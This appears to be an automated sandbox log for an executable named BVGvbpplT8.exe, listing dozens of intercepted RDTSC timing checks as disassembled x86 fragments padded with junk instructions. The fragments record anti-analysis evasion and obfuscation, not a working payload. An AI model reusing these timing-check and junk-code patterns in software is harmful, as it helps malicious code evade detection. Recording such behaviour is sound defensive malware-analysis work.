Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11C81E1 second address: 11C81ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11CC9B9 second address: 11CC9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FAAF8FC5086h 0x0000000c popad 0x0000000d jmp 00007FAAF8FC5094h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11CC9DA second address: 11CC9ED instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAAF912802Eh 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11CC51A second address: 11CC51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11CC51E second address: 11CC522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11DB3E2 second address: 11DB3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnl 00007FAAF8FC508Ch 0x0000000b pop edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11DB3FC second address: 11DB402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11DB402 second address: 11DB415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FAAF8FC5086h 0x0000000d jns 00007FAAF8FC5086h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11EB145 second address: 11EB15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FAAF912802Eh 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007FAAF9128026h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11EB15D second address: 11EB161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11ECB60 second address: 11ECB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAF912802Bh 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 120375C second address: 1203760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1203760 second address: 1203766 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1203766 second address: 1203777 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FAAF8FC5086h 0x00000009 jl 00007FAAF8FC5086h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1202502 second address: 120250E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 js 00007FAAF9128026h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 120250E second address: 120251D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FAAF8FC5086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 12026B9 second address: 12026C9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAAF9128026h 0x00000008 jc 00007FAAF9128026h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 120296C second address: 1202983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAF8FC5092h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1202B09 second address: 1202B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAF9128039h 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d ja 00007FAAF9128026h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1202B30 second address: 1202B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1202FE4 second address: 1203000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAF912802Bh 0x00000009 jo 00007FAAF9128026h 0x0000000f popad 0x00000010 pop ecx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1203000 second address: 1203006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1203006 second address: 120300A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 120300A second address: 120300E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1203182 second address: 12031A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jmp 00007FAAF9128031h 0x0000000e popad 0x0000000f push ebx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 12031A3 second address: 12031C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAAF8FC5086h 0x0000000a jg 00007FAAF8FC5086h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAAF8FC508Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 12063CF second address: 12063D9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 12063D9 second address: 12063DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 12066CC second address: 12066FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jc 00007FAAF912802Ah 0x0000000e push ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop ecx 0x00000012 nop 0x00000013 cld 0x00000014 push dword ptr [ebp+122D1F48h] 0x0000001a stc 0x0000001b push C2A58270h 0x00000020 push eax 0x00000021 push edx 0x00000022 jng 00007FAAF912802Ch 0x00000028 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 12078D8 second address: 12078DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 111BC78 second address: 111BC7D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5150444 second address: 5150448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5150448 second address: 515044E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 515044E second address: 5150480 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC5094h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAF8FC5097h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5150480 second address: 5150498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAF9128034h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5150498 second address: 51504B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC508Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51504B1 second address: 51504B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51504B5 second address: 51504BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51504BB second address: 51504E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 2Ah 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edx, dword ptr [ebp+0Ch] 0x0000000d jmp 00007FAAF9128037h 0x00000012 mov ecx, dword ptr [ebp+08h] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 mov di, ax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170720 second address: 5170724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170724 second address: 5170737 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF912802Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170737 second address: 5170767 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov ch, 27h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FAAF8FC508Ah 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAAF8FC5097h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170767 second address: 5170812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF9128039h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FAAF912802Eh 0x00000010 xchg eax, ecx 0x00000011 pushad 0x00000012 call 00007FAAF912802Eh 0x00000017 pushfd 0x00000018 jmp 00007FAAF9128032h 0x0000001d sbb ecx, 4B1CE3A8h 0x00000023 jmp 00007FAAF912802Bh 0x00000028 popfd 0x00000029 pop ecx 0x0000002a call 00007FAAF9128039h 0x0000002f mov bl, cl 0x00000031 pop edi 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FAAF9128034h 0x0000003d or al, 00000068h 0x00000040 jmp 00007FAAF912802Bh 0x00000045 popfd 0x00000046 mov ah, 5Eh 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170812 second address: 5170817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170817 second address: 51708D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FAAF912802Eh 0x0000000a and cl, FFFFFFC8h 0x0000000d jmp 00007FAAF912802Bh 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, ecx 0x00000017 pushad 0x00000018 mov si, 595Bh 0x0000001c movzx eax, bx 0x0000001f popad 0x00000020 push esp 0x00000021 jmp 00007FAAF9128038h 0x00000026 mov dword ptr [esp], esi 0x00000029 jmp 00007FAAF9128030h 0x0000002e lea eax, dword ptr [ebp-04h] 0x00000031 jmp 00007FAAF9128030h 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FAAF912802Dh 0x00000040 add si, 4EA6h 0x00000045 jmp 00007FAAF9128031h 0x0000004a popfd 0x0000004b pushfd 0x0000004c jmp 00007FAAF9128030h 0x00000051 and cx, 7448h 0x00000056 jmp 00007FAAF912802Bh 0x0000005b popfd 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51708D1 second address: 51708E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAF8FC5094h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51708E9 second address: 51708ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 517097E second address: 5170984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170984 second address: 51709C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF912802Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dl, 4Ch 0x00000012 pushfd 0x00000013 jmp 00007FAAF9128036h 0x00000018 or ax, 5288h 0x0000001d jmp 00007FAAF912802Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51709C8 second address: 51709F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC5099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov cx, dx 0x00000011 mov eax, edi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51709F0 second address: 51709F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51709F6 second address: 5170A18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FAAF8FC50EFh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAAF8FC5090h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170A18 second address: 5170A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170A75 second address: 5170A7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170A7B second address: 5170A9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, cl 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAF9128035h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170A9B second address: 5170AA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170AA0 second address: 5170AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 312F10E0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c leave 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAAF9128032h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170AC1 second address: 51601EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC508Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 jmp 00007FAAF8FC5082h 0x00000015 xor ebx, ebx 0x00000017 test al, 01h 0x00000019 jne 00007FAAF8FC5087h 0x0000001b sub esp, 04h 0x0000001e mov dword ptr [esp], 0000000Dh 0x00000025 call 00007FAAFD1E2835h 0x0000002a mov edi, edi 0x0000002c jmp 00007FAAF8FC5096h 0x00000031 xchg eax, ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FAAF8FC5097h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51601EC second address: 51601F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51601F2 second address: 51601F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51603BF second address: 51603C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51603C5 second address: 51603CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51603CB second address: 5160404 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF9128038h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAAF9128037h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160404 second address: 516043E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC5099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FAAF8FC5230h 0x0000000f jmp 00007FAAF8FC508Eh 0x00000014 lea ecx, dword ptr [ebp-14h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 516043E second address: 5160442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160442 second address: 5160448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51604AE second address: 51604C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF912802Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51604C1 second address: 51604F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAF8FC508Fh 0x00000009 add cl, 0000003Eh 0x0000000c jmp 00007FAAF8FC5099h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51605B4 second address: 51605E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF9128039h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f call 00007FAAF912802Ah 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51605E2 second address: 51605EB instructions: 0x00000000 rdtsc 0x00000002 mov ax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51605EB second address: 5160618 instructions: 0x00000000 rdtsc 0x00000002 mov ch, 44h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 lea eax, dword ptr [ebp-2Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007FAAF912802Ah 0x00000015 or esi, 1E740FD8h 0x0000001b jmp 00007FAAF912802Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160618 second address: 516061D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 516061D second address: 51606E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FAAF9128035h 0x0000000a adc esi, 418AC776h 0x00000010 jmp 00007FAAF9128031h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, esi 0x0000001a pushad 0x0000001b mov esi, 4A33E203h 0x00000020 pushfd 0x00000021 jmp 00007FAAF9128038h 0x00000026 adc cl, FFFFFFC8h 0x00000029 jmp 00007FAAF912802Bh 0x0000002e popfd 0x0000002f popad 0x00000030 push eax 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FAAF912802Fh 0x00000038 jmp 00007FAAF9128033h 0x0000003d popfd 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007FAAF9128036h 0x00000045 add si, C888h 0x0000004a jmp 00007FAAF912802Bh 0x0000004f popfd 0x00000050 movzx ecx, di 0x00000053 popad 0x00000054 popad 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FAAF912802Eh 0x0000005d rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51606E7 second address: 51606F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAF8FC508Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51606F9 second address: 51606FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 516078B second address: 51607A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAF8FC5094h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51607A3 second address: 5160084 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF912802Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, eax 0x0000000d jmp 00007FAAF9128036h 0x00000012 test esi, esi 0x00000014 jmp 00007FAAF9128030h 0x00000019 je 00007FAB6A925E9Dh 0x0000001f xor eax, eax 0x00000021 jmp 00007FAAF910175Ah 0x00000026 pop esi 0x00000027 pop edi 0x00000028 pop ebx 0x00000029 leave 0x0000002a retn 0004h 0x0000002d nop 0x0000002e xor ebx, ebx 0x00000030 cmp eax, 00000000h 0x00000033 je 00007FAAF9128183h 0x00000039 call 00007FAAFD3454ADh 0x0000003e mov edi, edi 0x00000040 jmp 00007FAAF9128035h 0x00000045 xchg eax, ebp 0x00000046 jmp 00007FAAF912802Eh 0x0000004b push eax 0x0000004c pushad 0x0000004d jmp 00007FAAF9128031h 0x00000052 pushfd 0x00000053 jmp 00007FAAF9128030h 0x00000058 sub ch, FFFFFF98h 0x0000005b jmp 00007FAAF912802Bh 0x00000060 popfd 0x00000061 popad 0x00000062 xchg eax, ebp 0x00000063 jmp 00007FAAF9128036h 0x00000068 mov ebp, esp 0x0000006a pushad 0x0000006b call 00007FAAF912802Eh 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160084 second address: 51600D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FAAF8FC5091h 0x0000000b adc ah, FFFFFF96h 0x0000000e jmp 00007FAAF8FC5091h 0x00000013 popfd 0x00000014 popad 0x00000015 xchg eax, ecx 0x00000016 jmp 00007FAAF8FC508Eh 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FAAF8FC508Eh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51600D1 second address: 51600D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
